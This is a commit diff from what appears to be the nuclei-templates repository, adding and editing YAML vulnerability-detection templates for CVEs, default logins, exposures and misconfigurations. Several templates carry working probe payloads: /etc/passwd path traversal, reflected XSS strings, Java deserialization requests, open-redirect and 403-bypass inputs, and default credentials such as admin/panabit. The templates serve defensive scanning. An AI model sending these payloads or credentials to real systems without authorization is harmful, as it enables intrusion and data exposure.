Merge pull request #51 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-05-16 18:32:39 +05:30 committed by GitHub
commit b90e02d078
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
58 changed files with 720 additions and 178 deletions

View File

@ -1,4 +1,4 @@
name: syntax-checking name: ❄️ YAML Lint
on: [push, pull_request] on: [push, pull_request]

View File

@ -1,4 +1,4 @@
name: "Auto Update README" name: 📝 Readme Update
on: on:
push: push:

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts | | Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 309 | vulnerabilities | 152 | exposed-panels | 126 | | cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
| takeovers | 67 | exposures | 96 | technologies | 66 | | takeovers | 67 | exposures | 99 | technologies | 67 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | | misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 | | default-logins | 26 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 | | fuzzing | 9 | helpers | 8 | iot | 11 |
**103 directories, 1068 files**. **105 directories, 1085 files**.
</td> </td>
</tr> </tr>

View File

@ -7,7 +7,7 @@ info:
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: phpmyadmin,rce,deserialization tags: cve,cve2009,phpmyadmin,rce,deserialization
requests: requests:
- raw: - raw:

View File

@ -10,6 +10,7 @@ info:
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: | description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests: requests:
- method: POST - method: POST

39
cves/2017/CVE-2017-12149.yaml Executable file
View File

@ -0,0 +1,39 @@
id: CVE-2017-12149
info:
name: Java/Jboss Deserialization [RCE]
author: fopina
severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization
requests:
- raw:
- |
POST /invoker/JMXInvokerServlet/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
- |
POST /invoker/EJBInvokerServlet/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
matchers-condition: and
matchers:
- type: word
words:
- "ClassCastException"
part: body
- type: word
words:
- "application/x-java-serialized-object"
part: header

View File

@ -1,25 +1,31 @@
id: CVE-2017-7269 id: CVE-2017-7269
info: info:
name: CVE-2017-7269 name: Windows Server 2003 & IIS 6.0 RCE
author: thomas_from_offensity author: thomas_from_offensity & @geeknik
severity: critical severity: critical
description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2 description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
reference: https://github.com/danigargu/explodingcan/blob/master/explodingcan.py reference:
- https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
- https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
tags: cve,cve2017,rce
requests: requests:
- method: OPTIONS - method: OPTIONS
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "IIS/6.0" - "IIS/6.0"
part: header part: header
- type: dsl - type: dsl
dsl: dsl:
- regex("<DAV:sql>", dasl) # lowercase header name: DASL - regex("<DAV:sql>", dasl) # lowercase header name: DASL

View File

@ -9,7 +9,7 @@ info:
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
- https://ecosystem.atlassian.net/browse/OAUTH-344 - https://ecosystem.atlassian.net/browse/OAUTH-344
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
tags: cve,cve2017,atlassian,jira,ssrf tags: cve,cve2017,atlassian,jira,ssrf,oob
requests: requests:
- raw: - raw:

View File

@ -1,62 +0,0 @@
id: CVE-2018-0101
info:
name: Cisco ASA Denial-of-Service # Leads to RCE
author: dwisiswant0
severity: critical
reference: https://www.exploit-db.com/exploits/43986
description: |
A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
tags: cve,cve2018,cisco,dos,rce
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Aggregate-Auth: 1
X-Transcend-Version: 1
Accept-Encoding: identity
X-AnyConnect-Platform: linux-64
X-Support-HTTP-Auth: false
X-Pad: 0000000000000000000000000000000000000000
<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- type: dsl
dsl:
- "status_code_2 == 500"
- "status_code_2 == 501"
- "status_code_2 == 502"
- "status_code_2 == 503"
- "status_code_2 == 504"
condition: or
- type: dsl
dsl:
- "status_code_3 == 200"
negative: true

View File

@ -7,7 +7,7 @@ info:
reference: | reference: |
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
- https://www.exploit-db.com/exploits/44495/ - https://www.exploit-db.com/exploits/44495/
tags: cobub,razor,exposure tags: cve,cve2018,cobub,razor,exposure
requests: requests:
- method: GET - method: GET

View File

@ -4,7 +4,7 @@ info:
author: pussycat0x author: pussycat0x
severity: high severity: high
reference: https://github.com/shi-yang/jnoj/issues/53 reference: https://github.com/shi-yang/jnoj/issues/53
tegs: cve.cve2019,jnoj,lfi tags: cve.cve2019,jnoj,lfi
requests: requests:
- raw: - raw:

View File

@ -4,6 +4,7 @@ info:
name: Apache Cocoon 2.1.12 XML Injection name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu author: pikpikcu
severity: high severity: high
tags: cve,cve2020,apache,xml,cocoon
description: | description: |
When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E

View File

@ -18,7 +18,7 @@ requests:
- type: word - type: word
words: words:
- "{alert(document.domain);}" - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
part: body part: body
- type: word - type: word

View File

@ -11,7 +11,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -26,5 +26,5 @@ requests:
- type: word - type: word
words: words:
- '"><script>alert(document.domain);</script>' - "'>\"<svg/onload=confirm('xss')>"
part: body part: body

View File

@ -26,4 +26,4 @@ requests:
part: body part: body
group: 1 group: 1
regex: regex:
- "<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>" - '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'

View File

@ -6,7 +6,7 @@ info:
severity: medium severity: medium
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
reference: https://trovent.io/security-advisory-2010-01 reference: https://trovent.io/security-advisory-2010-01
tags: rockethchat tags: cve,cve2020,rockethchat
requests: requests:
- raw: - raw:

View File

@ -11,7 +11,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -25,3 +25,7 @@ requests:
words: words:
- '<img src="" onerror="alert(1);">1</img>' - '<img src="" onerror="alert(1);">1</img>'
part: body part: body
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
author: princechaddha author: princechaddha
severity: critical severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
network: network:
- inputs: - inputs:

View File

@ -0,0 +1,41 @@
id: CVE-2021-27651
info:
name: Pega Infinity Authentication bypass
author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference: |
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/prweb/PRAuth/app/default/"
cookie-reuse: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Pega Infinity"
part: body
- type: regex
regex:
- 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
part: body
extractors:
- type: regex
regex:
- 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
part: body

View File

@ -0,0 +1,28 @@
id: CVE-2021-31537
info:
name: SIS-REWE GO version 7.5.0/12C XSS
author: geeknik
description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
severity: medium
tags: cve,cve2021,xss
requests:
- method: GET
path:
- "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>confirm({{randstr}})</script>"
- "SIS-REWE"
condition: and
- type: word
part: header
words:
- "text/html"

View File

@ -0,0 +1,23 @@
id: CVE-2021-31800
info:
name: Impacket directory traversal
author: geeknik
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
severity: high
tags: impacket,cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"

View File

@ -0,0 +1,45 @@
id: panabit-gateway-defalut-password
info:
name: Panabit Default Password
author: pikpikcu
severity: high
reference: https://max.book118.com/html/2017/0623/117514590.shtm
tags: panabit,default-login
requests:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 246
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Referer: {{BaseURL}}/login/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="password"
panabit
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
matchers-condition: and
matchers:
- type: word
words:
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
- 'urn:schemas-microsoft-com:vml'
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: showdoc-default-password
info:
name: Showdoc Default Password
author: pikpikcu
severity: medium
reference: |
- https://blog.star7th.com/2016/05/2007.html
tags: showdoc,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/server/index.php?s=/api/user/login"
body: |
username=showdoc&password=123456&v_code=
headers:
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
matchers-condition: and
matchers:
- type: word
words:
- '"username":"showdoc"'
- '"user_token":'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: microsoft-exchange-control-panel
info:
name: Microsoft Exchange Control Panel
author: r3dg33k
severity: info
description: Publicly accessible Microsoft Exchange Server Control Panel
tags: microsoft,panel
reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Exchange Admin Center'

View File

@ -1,4 +1,5 @@
id: tomcat-manager-pathnormalization id: tomcat-manager-pathnormalization
info: info:
name: Tomcat Manager Path Normalization name: Tomcat Manager Path Normalization
author: organiccrap author: organiccrap
@ -11,11 +12,17 @@ requests:
path: path:
- '{{BaseURL}}/..;/manager/html' - '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/host-manager/html' - '{{BaseURL}}/..;/host-manager/html'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- username="tomcat" password="s3cret" - 'username="tomcat" password="s3cret"'
- manager-gui - 'manager-gui'
condition: and condition: and
- type: status
status:
- 403
- 401
negative: true

View File

@ -0,0 +1,54 @@
id: php-backup-files
info:
name: PHP source disclosure through backup files
author: StreetOfHackerR007 (Rohit Soni)
severity: medium
tags: exposure,backup,php
requests:
- method: GET
path:
- "{{BaseURL}}/index.php.bak"
- "{{BaseURL}}/default.php.bak"
- "{{BaseURL}}/main.php.bak"
- "{{BaseURL}}/config.php.bak"
- "{{BaseURL}}/settings.php.bak"
- "{{BaseURL}}/header.php.bak"
- "{{BaseURL}}/footer.php.bak"
- "{{BaseURL}}/login.php.bak"
- "{{BaseURL}}/database.php.bak"
- "{{BaseURL}}/db.php.bak"
- "{{BaseURL}}/conn.php.bak"
- "{{BaseURL}}/db_config.php.bak"
- "{{BaseURL}}/404.php.bak"
- "{{BaseURL}}/wp-config.php.bak"
- "{{BaseURL}}/wp-login.php.bak"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "<?="
condition: or
part: body
- type: word
words:
- "?>"
part: body
- type: word
words:
- "text/plain"
- "bytes"
part: header
condition: or

View File

@ -5,7 +5,9 @@ info:
severity: medium severity: medium
description: Nginx off-by-slash vulnerability exposes Git configuration. description: Nginx off-by-slash vulnerability exposes Git configuration.
tags: config,exposure tags: config,exposure
reference: https://twitter.com/Random_Robbie/status/1262676628167110656 reference: |
- https://twitter.com/Random_Robbie/status/1262676628167110656
- https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
requests: requests:
- method: GET - method: GET

View File

@ -17,7 +17,6 @@ requests:
- "{{BaseURL}}/.env.prod.local" - "{{BaseURL}}/.env.prod.local"
- "{{BaseURL}}/.env.production.local" - "{{BaseURL}}/.env.production.local"
- "{{BaseURL}}/.env.local" - "{{BaseURL}}/.env.local"
- "{{BaseURL}}/.env.example"
- "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.stage"
- "{{BaseURL}}/.env.live" - "{{BaseURL}}/.env.live"
matchers-condition: and matchers-condition: and

View File

@ -0,0 +1,25 @@
id: ruijie-phpinfo
info:
name: Ruijie Phpinfo
author: pikpikcu
severity: low
reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
tags: phpinfo,rujjie,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/tool/view/phpinfo.view.php"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Version"
- "PHP Extension"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,47 @@
id: xff-403-bypass
info:
name: X-Forwarded-For 403-forbidden bypass
author: vavkamil
severity: info
description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
tags: xff,bypass,fuzz
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
- |
GET /test.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 403 && status_code_2 != 403"
- "status_code_1 == 403 && status_code_3 != 403"
condition: or

View File

@ -0,0 +1,29 @@
id: apache-filename-brute-force
info:
name: Apache Filename Brute Force
author: geeknik
description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing.
reference: |
- https://hackerone.com/reports/210238
- https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/
severity: low
tags: apache
requests:
- method: GET
headers:
Accept: "fake/value"
path:
- "{{BaseURL}}/index"
matchers-condition: and
matchers:
- type: status
status:
- 406
- type: word
words:
- "Not Acceptable"
- "Available variants:"
- "<address>Apache Server at"
condition: and

View File

@ -0,0 +1,25 @@
id: cloudflare-external-image-resize
info:
name: Cloudflare External Image Resizing Misconfiguration
author: vavkamil
severity: info
description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
tags: cloudflare,misconfig,oob
requests:
- raw:
- |
GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: Sensitive environment variables may not be masked description: Sensitive environment variables may not be masked
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -3,8 +3,9 @@ id: springboot-env
info: info:
name: Detect Springboot Env Actuator name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: high severity: low
description: Sensitive environment variables may not be masked description: Sensitive environment variables may not be masked
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET
@ -17,8 +18,14 @@ requests:
part: body part: body
words: words:
- "applicationConfig" - "applicationConfig"
- type: word
part: body
words:
- "server.port"
- "local.server.port" - "local.server.port"
condition: and condition: or
- type: status - type: status
status: status:
- 200 - 200

View File

@ -5,12 +5,15 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: critical severity: critical
description: Environment variables and HTTP requests can be found in the HPROF description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/heapdump" - "{{BaseURL}}/heapdump"
- "{{BaseURL}}/actuator/heapdump" - "{{BaseURL}}/actuator/heapdump"
max-size: 2097152 # 2MB - Max Size to read from server response
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: binary - type: binary
@ -20,16 +23,19 @@ requests:
- "4850524f46" # "HPROF" - "4850524f46" # "HPROF"
- "1f8b080000000000" # Gunzip magic byte - "1f8b080000000000" # Gunzip magic byte
condition: or condition: or
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "application/octet-stream" - "application/octet-stream"
- "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json" - "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header part: header
condition: or
- type: dsl - type: dsl
dsl: dsl:
- "len(body) >= 100000" - "len(body) >= 100000"

View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: View recent HTTP requests and responses description: View recent HTTP requests and responses
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Springboot Loggers name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: Additional routes may be displayed description: Additional routes may be displayed
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -5,11 +5,13 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: View recent HTTP requests and responses description: View recent HTTP requests and responses
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/trace" - "{{BaseURL}}/trace"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word

59
network/rdp-detect.yaml Normal file
View File

@ -0,0 +1,59 @@
id: rdp-detect
info:
name: Windows RDP Detection
author: princechaddha
severity: info
tags: windows,rdp,network
network:
- inputs:
- data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000"
type: hex
read-size: 2048
host:
- "{{Hostname}}"
- "{{Hostname}}:3389"
matchers:
- type: word
encoding: hex
name: win2000
words:
- "0300000b06d00000123400"
- type: word
encoding: hex
name: win2003
words:
- "030000130ed000001234000300080002000000"
- type: word
encoding: hex
name: win2008
words:
- "030000130ed000001234000200080002000000"
- type: word
encoding: hex
name: win7or2008R2
words:
- "030000130ed000001234000209080002000000"
- type: word
encoding: hex
name: win2008R2DC
words:
- "030000130ed000001234000201080002000000"
- type: word
encoding: hex
name: win10
words:
- "030000130ed00000123400021f080002000000"
- type: word
encoding: hex
name: win2012R2OR8
words:
- "030000130ed00000123400020f080002000000"
- type: word
encoding: hex
name: win2016
words:
- "030000130ed00000123400021f080008000000"

View File

@ -1,20 +0,0 @@
id: detect-springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"_links":{"self"'
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '"_links":'
- '"self":'
- '"health"'
condition: and
- type: dsl
name: "favicon"
dsl:
- "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))"

View File

@ -0,0 +1,25 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
references:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'

View File

@ -21,10 +21,7 @@ requests:
- '{{BaseURL}}/example%E3%80%82com' - '{{BaseURL}}/example%E3%80%82com'
- '{{BaseURL}}/%5Cexample.com' - '{{BaseURL}}/%5Cexample.com'
- '{{BaseURL}}/example.com' - '{{BaseURL}}/example.com'
- '{{BaseURL}}\example.com'
- '{{BaseURL}}//example.com/' - '{{BaseURL}}//example.com/'
- '{{BaseURL}}\/\/example.com/'
- '{{BaseURL}}%00\/\/example.com/'
- '{{BaseURL}}/%00/example.com/' - '{{BaseURL}}/%00/example.com/'
- '{{BaseURL}}/%09/example.com/' - '{{BaseURL}}/%09/example.com/'
- '{{BaseURL}}/%0a/example.com/' - '{{BaseURL}}/%0a/example.com/'
@ -33,14 +30,9 @@ requests:
- '{{BaseURL}}/%5cexample.com/%2f%2e%2e' - '{{BaseURL}}/%5cexample.com/%2f%2e%2e'
- '{{BaseURL}}@example.com' - '{{BaseURL}}@example.com'
- '{{BaseURL}}/{{BaseURL}}example.com' - '{{BaseURL}}/{{BaseURL}}example.com'
- '{{BaseURL}}\{{BaseURL}}example.com'
- '{{BaseURL}}//{{BaseURL}}example.com/' - '{{BaseURL}}//{{BaseURL}}example.com/'
- '{{BaseURL}}\/\/{{BaseURL}}example.com/'
- '{{BaseURL}}%00\/\/{{BaseURL}}example.com/'
- '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}/〱{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}@{{BaseURL}}example.com'
